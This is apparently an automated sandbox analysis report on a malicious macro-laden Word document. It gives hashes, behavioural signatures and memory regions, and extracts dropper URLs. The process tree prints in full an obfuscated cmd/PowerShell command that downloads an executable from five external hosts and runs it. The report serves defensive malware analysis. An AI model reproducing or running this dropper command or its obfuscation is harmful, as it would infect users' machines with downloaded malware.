Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    09/05/2024, 23:46

General

  • Target

    2c4bd045791506a7b824d6c30a4d3346_JaffaCakes118.doc

  • Size

    175KB

  • MD5

    2c4bd045791506a7b824d6c30a4d3346

  • SHA1

    74c2a3b338288b5f779e099007da05084ce43990

  • SHA256

    0de620338216a3c13ea8a4d29f48ec20723321277d41c14f17c94fd8282dc32a

  • SHA512

    f9e82c64136ad92fb1a5e6243b51c2f344e4400b5ef900385e8cea73dc9f32003f71a3d8ad525c2212c46e023f7f97c870e1d06a1fb8ec3468bd49730ba6ee93

  • SSDEEP

    3072:e20EgXSimeOy6MzJiNKDzaJFUKc0UTE7yZRUV7RJeOzi8E:e2yXrmaMEDzYUTE7yZRVUi8E

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://salah.mobiilat.com/e24sv6_38Ihrh_nVYqny

exe.dropper

http://panlierhu.com/XMy9MFv1_pDQsD

exe.dropper

http://salecar2.muasam360.com/wp-content/9z7_MFL011

exe.dropper

http://afordioretails.com/D4Rm_Eugj

exe.dropper

http://thanhlapdoanhnghiephnh.com/kbCg0oh0_rNNj4TLtq_K

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2c4bd045791506a7b824d6c30a4d3346_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3020
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $f7116='d3805';$h5723=new-object Net.WebClient;$t845='http://salah.mobiilat.com/e24sv6_38Ihrh_nVYqny@http://panlierhu.com/XMy9MFv1_pDQsD@http://salecar2.muasam360.com/wp-content/9z7_MFL011@http://afordioretails.com/D4Rm_Eugj@http://thanhlapdoanhnghiephnh.com/kbCg0oh0_rNNj4TLtq_K'.Split('@');$u4962='o981';$m9881 = '157';$b5472='p3362';$m2835=$env:temp+'\'+$m9881+'.exe';foreach($b5266 in $t845){try{$h5723.DownloadFile($b5266, $m2835);$f3575='q6332';If ((Get-Item $m2835).length -ge 40000) {Invoke-Item $m2835;$m5367='z5680';break;}}catch{}}$d2752='v4875';
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $f7116='d3805';$h5723=new-object Net.WebClient;$t845='http://salah.mobiilat.com/e24sv6_38Ihrh_nVYqny@http://panlierhu.com/XMy9MFv1_pDQsD@http://salecar2.muasam360.com/wp-content/9z7_MFL011@http://afordioretails.com/D4Rm_Eugj@http://thanhlapdoanhnghiephnh.com/kbCg0oh0_rNNj4TLtq_K'.Split('@');$u4962='o981';$m9881 = '157';$b5472='p3362';$m2835=$env:temp+'\'+$m9881+'.exe';foreach($b5266 in $t845){try{$h5723.DownloadFile($b5266, $m2835);$f3575='q6332';If ((Get-Item $m2835).length -ge 40000) {Invoke-Item $m2835;$m5367='z5680';break;}}catch{}}$d2752='v4875';
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2532
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1612

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      1c124523f8967a166741ea83c8085952

      SHA1

      da4c51e29c40876538b53f35c496cfe22ef4a305

      SHA256

      4944a93d2b812b0a7629d34a00ca5b33d3a6f7876dfb24196d98e48ff8ea3472

      SHA512

      a9ad87c4c734ea42d9ca21e95d22569d428db182af62ca4488fe08acbb06a9015fa93bf3e18cd1861055a436e419f43200ddaf4ccc9ecf0f91fcdf295b7bba75

    • memory/3020-16-0x0000000005850000-0x0000000005950000-memory.dmp

      Filesize

      1024KB

    • memory/3020-0-0x000000002F1C1000-0x000000002F1C2000-memory.dmp

      Filesize

      4KB

    • memory/3020-21-0x0000000005850000-0x0000000005950000-memory.dmp

      Filesize

      1024KB

    • memory/3020-30-0x0000000005850000-0x0000000005950000-memory.dmp

      Filesize

      1024KB

    • memory/3020-31-0x0000000005850000-0x0000000005950000-memory.dmp

      Filesize

      1024KB

    • memory/3020-43-0x0000000005850000-0x0000000005950000-memory.dmp

      Filesize

      1024KB

    • memory/3020-44-0x000000007146D000-0x0000000071478000-memory.dmp

      Filesize

      44KB

    • memory/3020-2-0x000000007146D000-0x0000000071478000-memory.dmp

      Filesize

      44KB

    • memory/3020-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/3020-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/3020-67-0x000000007146D000-0x0000000071478000-memory.dmp

      Filesize

      44KB